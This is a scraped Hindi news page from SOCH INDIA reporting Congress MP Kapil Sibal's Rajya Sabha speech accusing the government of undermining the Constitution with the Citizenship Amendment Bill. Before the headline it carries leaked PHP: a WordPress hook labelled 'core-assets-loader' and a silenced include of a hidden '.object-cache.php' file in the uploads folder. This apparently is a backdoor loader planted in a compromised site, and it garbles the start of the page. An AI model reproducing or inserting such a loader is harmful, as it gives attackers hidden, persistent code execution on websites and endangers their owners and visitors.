add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); नागरिकता बिल पर राज्यसभा में संग्राम, सिब्बल बोले- आप उड़ा रहे संविधान की धज्जियां – SOCH INDIA
Menu

देश
नागरिकता बिल पर राज्यसभा में संग्राम, सिब्बल बोले- आप उड़ा रहे संविधान की धज्जियां

nobanner

राज्यसभा में नागरिकता संशोधन बिल पर चल रही चर्चा के दौरान कांग्रेस सांसद कपिल सिब्बल ने कहा कि टू नेशन थ्योरी सावरकर ने दी थी. भारत का भरोसा 2 नेशन थ्योरी में नहीं है. सरकार आज दो नेशन थ्योरी सही करने जा रही है. कांग्रेस एक नेशन में भरोसा करती है. आप नहीं करते. गृह मंत्री ने सही कहा कि यह दिन ऐतिहासिक है. आप संविधान की बुनियाद को बदलने जा रहे हैं. इसलिए यह ऐतिहासिक दिन है. आप हमारा इतिहास बदलने जा रहे हैं. इसलिए यह ऐतिहासिक दिन है.

सिब्बल ने आगे कहा कि आपने कहा कि करोड़ों लोगों के लिए नई सुबह आने वाली है लेकिन मैं कहूंगा कि लाखों लोगों की यह काली रात खत्म नहीं होगी. आप कहते हैं कि आपके प्रधानमंत्री सबका साथ सबका विकास और सबका विश्वास में विश्वास करते हैं लेकिन उन्होंने सबका विश्वास तो खो दिया है. 2014 से लेकर अभी तक कभी भी सबका साथ उन्होंने कभी नहीं दिया. आप इस देश का भविष्य बर्बाद कर रहे हैं. यह बिल दो नेशन थ्योरी को कानूनी रंग देता है. धर्म कभी भी नागरिकता के लिए आधार नहीं हो सकता और इसे संविधान भी नकारता है.